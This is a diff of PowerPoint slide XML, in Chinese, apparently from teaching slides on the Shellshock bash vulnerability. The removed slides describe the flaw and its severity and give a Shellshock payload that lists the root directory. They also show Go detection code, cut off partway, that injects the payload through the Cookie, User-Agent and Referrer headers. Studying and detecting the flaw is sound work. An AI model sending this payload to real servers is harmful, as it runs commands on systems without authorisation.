-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>24</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>日，一位名叫斯特凡</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>·</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>沙泽拉的安全研究者发现了一个名为“破壳”（</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>Shellshock</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
-              <a:t>，</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>也称为“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>门”或“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>Bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>漏洞”）的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>漏洞。该漏洞如果被渗透，远程攻击者就可以在调用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>shell</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后，这些函数内的代码就可以在调用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>时立即执行。</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="文本框 7">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15046D8D-F7C3-0D47-86D4-39F94A85EFEE}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913774" y="3594970"/>
-            <a:ext cx="9745876" cy="1384995"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>来自</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>CVSS</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>的评分：破壳漏洞的严重性被定义为</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>10</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>级（最高），今年</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>月爆发的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>OpenSSL“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>心脏出血”漏洞才</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>5</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>级！</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>破壳漏洞存在有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>25</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>年，和</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
-              <a:t>Bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
-              <a:t>年龄一样。</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4030492480"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="544530004"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7373,7 +6842,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E3877A-22AC-EC40-A0A9-2F550024B2D2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C205E15-993E-D54D-AE9D-76A36194845F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -7386,117 +6855,57 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="0"/>
-            <a:ext cx="9307463" cy="809450"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
+            <a:off x="811034" y="248479"/>
+            <a:ext cx="9596688" cy="563011"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>破壳漏洞检测思路</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
+              <a:t>检查漏洞</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="图片 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F77767-A903-884B-9C15-F1309F8D0B89}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E326BB9D-7B16-5440-93A4-CF86B08AD979}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="413359" y="809450"/>
-            <a:ext cx="11448789" cy="1569660"/>
+            <a:off x="113015" y="900663"/>
+            <a:ext cx="10941977" cy="5708858"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>通过网站</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>www.seebug.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>vuldb</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>/ssvid-88877</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>提供的破壳漏洞检测代码，我们使用想远程的地址发送</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>() { :;};echo ; echo; echo $(/bin/ls -la /);</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
-              <a:t>命令</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>，然后检查响应体，通过检查响应体中是否有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>drwxr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
-              <a:t>xr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>-x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>权限来判断是否能获取权限，虽然漏洞非常危险，但是检测起来思路还是比较明晰，实现代码如下：</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9686266"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1203944552"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7525,824 +6934,36 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="矩形 3">
+          <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E66787B-38C1-3D45-BFE8-D65BFE28839F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA2C099-DF49-D845-A9B2-5BCBCD4195B3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2446751" y="0"/>
-            <a:ext cx="6096000" cy="6524863"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:spAutoFit/>
-          </a:bodyPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>pocList</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> := []</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>string</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>{</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"() { :;};echo ; echo; echo $(/bin/ls -la /);"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>,</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="787878"/>
-                </a:solidFill>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>for </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>_</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>range </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>pocList</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>http</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>NewRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"GET"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>checkURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>nil</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>request.Header.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Set</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"cookie"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>request.Header.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Set</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"User-Agent"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>request.Header.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Set</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"Referrer"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>poc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   resp</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>util</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>RequestDo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>true</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6897BB"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>15</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>err != </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>nil </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>{</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>strings</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
